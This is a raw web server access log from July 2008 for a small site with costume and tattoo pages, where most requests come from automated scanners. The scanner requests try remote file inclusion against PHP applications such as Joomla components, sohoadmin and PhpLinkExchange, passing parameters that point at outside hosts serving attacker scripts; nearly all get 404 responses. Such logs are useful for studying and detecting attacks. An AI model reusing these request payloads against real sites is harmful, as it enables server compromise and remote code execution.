82.99.30.3 - - [12/Jul/2008:19:06:52 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
77.232.68.17 - - [12/Jul/2008:19:07:56 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.232.68.17 - - [12/Jul/2008:19:07:56 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.227.65.79 - - [12/Jul/2008:19:08:45 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:08:46 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:08:46 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:08:46 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:09:22 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:09:23 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:09:23 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:09:23 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
82.194.70.164 - - [12/Jul/2008:19:11:27 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lisey.ca/sohoadmin/save?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.194.70.164 - - [12/Jul/2008:19:11:28 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lisey.ca/sohoadmin/save?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.227.65.79 - - [12/Jul/2008:19:15:00 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:15:00 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:15:00 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:15:01 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:15:01 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:15:01 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:15:01 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
212.227.65.79 - - [12/Jul/2008:19:15:02 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
192.80.24.35 - - [12/Jul/2008:19:17:38 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
192.80.24.35 - - [12/Jul/2008:19:17:38 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
192.80.24.35 - - [12/Jul/2008:19:17:38 -0500] "GET //Neos_Chronos/header.php?base_folder=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
192.80.24.35 - - [12/Jul/2008:19:17:38 -0500] "GET //Neos_Chronos/header.php?base_folder=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
192.80.24.35 - - [12/Jul/2008:19:17:39 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
192.80.24.35 - - [12/Jul/2008:19:17:39 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
83.103.23.40 - - [12/Jul/2008:19:20:14 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:19:20:14 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:19:20:15 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:19:20:15 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.210.113.58 - - [12/Jul/2008:19:27:00 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
62.210.113.58 - - [12/Jul/2008:19:27:00 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
83.103.23.40 - - [12/Jul/2008:19:27:40 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:19:27:41 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:19:27:41 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:19:27:41 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
213.203.208.158 - - [12/Jul/2008:19:28:46 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.riksterwebergroep.nl/site/contentimage/cmd7.gif?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
213.203.208.158 - - [12/Jul/2008:19:28:46 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.riksterwebergroep.nl/site/contentimage/cmd7.gif?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
62.193.249.128 - - [12/Jul/2008:19:30:42 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://l33th4ck.altervista.org/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
62.193.249.128 - - [12/Jul/2008:19:30:43 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://l33th4ck.altervista.org/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.6.18.252 - - [12/Jul/2008:19:31:09 -0500] "GET /artwork/coffins.htm HTTP/1.0" 200 1485 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.119 - - [12/Jul/2008:19:34:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jul/2008:19:34:39 -0500] "GET /costume/thmb4.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
75.125.143.162 - - [12/Jul/2008:19:34:45 -0500] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
75.125.143.162 - - [12/Jul/2008:19:34:46 -0500] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
62.193.249.128 - - [12/Jul/2008:19:40:07 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://l33th4ck.altervista.org/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
62.193.249.128 - - [12/Jul/2008:19:40:07 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://l33th4ck.altervista.org/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
200.49.145.16 - - [12/Jul/2008:19:43:08 -0500] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
200.49.145.16 - - [12/Jul/2008:19:43:08 -0500] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
200.49.145.16 - - [12/Jul/2008:19:43:09 -0500] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
200.49.145.16 - - [12/Jul/2008:19:43:10 -0500] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
75.0.18.81 - - [12/Jul/2008:19:45:05 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.le-poulailler.com/includes/idd.txt?%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
75.0.18.81 - - [12/Jul/2008:19:45:05 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.le-poulailler.com/includes/idd.txt?%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
64.246.22.32 - - [12/Jul/2008:19:45:37 -0500] "GET /logs/index2.php?x=http://www.le-poulailler.com/includes/idd.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.246.22.32 - - [12/Jul/2008:19:45:37 -0500] "GET /index2.php?x=http://www.le-poulailler.com/includes/idd.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.157.210 - - [12/Jul/2008:19:47:58 -0500] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.157.210 - - [12/Jul/2008:19:47:58 -0500] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.157.185.8 - - [12/Jul/2008:19:48:10 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 287 "-""libwww-perl/5.805"
203.157.185.8 - - [12/Jul/2008:19:48:14 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 282 "-""libwww-perl/5.805"
72.55.156.181 - - [12/Jul/2008:19:53:59 -0500] "GET /logs/access_log.1211241600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.810"
72.55.156.181 - - [12/Jul/2008:19:53:59 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
72.55.156.181 - - [12/Jul/2008:19:53:59 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.810"
65.55.208.131 - - [12/Jul/2008:19:57:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [12/Jul/2008:19:57:13 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.18.76 - - [12/Jul/2008:19:57:21 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:19:57:22 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:19:57:28 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:19:57:33 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
203.157.185.8 - - [12/Jul/2008:20:07:22 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 317 "-""libwww-perl/5.805"
203.157.185.8 - - [12/Jul/2008:20:07:26 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 312 "-""libwww-perl/5.805"
72.55.156.181 - - [12/Jul/2008:20:09:21 -0500] "GET /logs/access_log.1212969600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.810"
211.20.85.150 - - [12/Jul/2008:20:14:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
83.103.23.40 - - [12/Jul/2008:20:17:29 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:20:17:30 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:20:17:30 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:20:17:30 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
194.79.75.195 - - [12/Jul/2008:20:21:13 -0500] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.246.22.32 - - [12/Jul/2008:20:34:43 -0500] "GET ///?custompluginfile%5B%5D=http://www.le-poulailler.com/includes/idd.txt?%0D?? HTTP/1.1" 200 1244 "-""libwww-perl/5.805"
64.246.22.32 - - [12/Jul/2008:20:34:43 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.le-poulailler.com/includes/idd.txt?%0D?? HTTP/1.1" 200 91135 "-""libwww-perl/5.805"
217.110.54.240 - - [12/Jul/2008:20:37:14 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
217.110.54.240 - - [12/Jul/2008:20:37:15 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
67.195.51.153 - - [12/Jul/2008:20:43:53 -0500] "GET /costume/costume2.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.137 - - [12/Jul/2008:20:44:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [12/Jul/2008:20:44:57 -0500] "GET /logs/access_log.1170892800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
194.30.128.45 - - [12/Jul/2008:20:45:06 -0500] "GET /logs/http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
194.30.128.45 - - [12/Jul/2008:20:45:08 -0500] "GET /http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
67.195.52.94 - - [12/Jul/2008:20:45:49 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.94 - - [12/Jul/2008:20:45:58 -0500] "GET /costume/thmb4.htm HTTP/1.0" 200 3298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.156.181 - - [12/Jul/2008:20:47:09 -0500] "GET /logs/access_log.1211241600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.810"
72.55.156.181 - - [12/Jul/2008:20:47:09 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
72.55.156.181 - - [12/Jul/2008:20:47:10 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.810"
66.188.107.16 - - [12/Jul/2008:20:49:08 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.808"
66.188.107.16 - - [12/Jul/2008:20:49:08 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.808"
66.188.107.16 - - [12/Jul/2008:20:49:12 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.808"
66.188.107.16 - - [12/Jul/2008:20:49:12 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.808"
75.125.143.162 - - [12/Jul/2008:20:51:20 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
75.125.143.162 - - [12/Jul/2008:20:51:20 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.6.31.166 - - [12/Jul/2008:20:51:50 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
75.125.143.162 - - [12/Jul/2008:20:53:12 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
75.125.143.162 - - [12/Jul/2008:20:53:12 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.173.24.141 - - [12/Jul/2008:20:56:10 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
66.173.24.141 - - [12/Jul/2008:20:56:11 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
66.173.24.141 - - [12/Jul/2008:20:56:13 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
66.173.24.141 - - [12/Jul/2008:20:56:14 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
80.67.25.167 - - [12/Jul/2008:20:56:19 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
80.67.25.167 - - [12/Jul/2008:20:56:19 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
83.103.23.40 - - [12/Jul/2008:21:04:00 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:21:04:00 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:21:04:01 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:21:04:01 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
217.110.54.240 - - [12/Jul/2008:21:05:01 -0500] "GET /logs/db.php?path_local=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
217.110.54.240 - - [12/Jul/2008:21:05:02 -0500] "GET /db.php?path_local=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
210.127.253.161 - - [12/Jul/2008:21:08:22 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
210.127.253.161 - - [12/Jul/2008:21:08:22 -0500] "GET //ashnews.php?pathtoashnews=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
63.254.136.249 - - [12/Jul/2008:21:09:19 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
63.254.136.249 - - [12/Jul/2008:21:09:20 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
63.254.136.249 - - [12/Jul/2008:21:10:17 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
63.254.136.249 - - [12/Jul/2008:21:10:18 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://210.60.147.157/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
200.49.145.16 - - [12/Jul/2008:21:16:38 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
200.49.145.16 - - [12/Jul/2008:21:16:38 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
200.49.145.16 - - [12/Jul/2008:21:16:38 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
200.49.145.16 - - [12/Jul/2008:21:16:38 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
72.55.156.181 - - [12/Jul/2008:21:21:05 -0500] "GET /logs/access_log.1212969600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.810"
74.6.18.252 - - [12/Jul/2008:21:28:52 -0500] "GET /logs/access_log.1195689600 HTTP/1.0" 200 154405 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.18.76 - - [12/Jul/2008:21:36:25 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:21:36:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:21:36:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:21:36:30 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
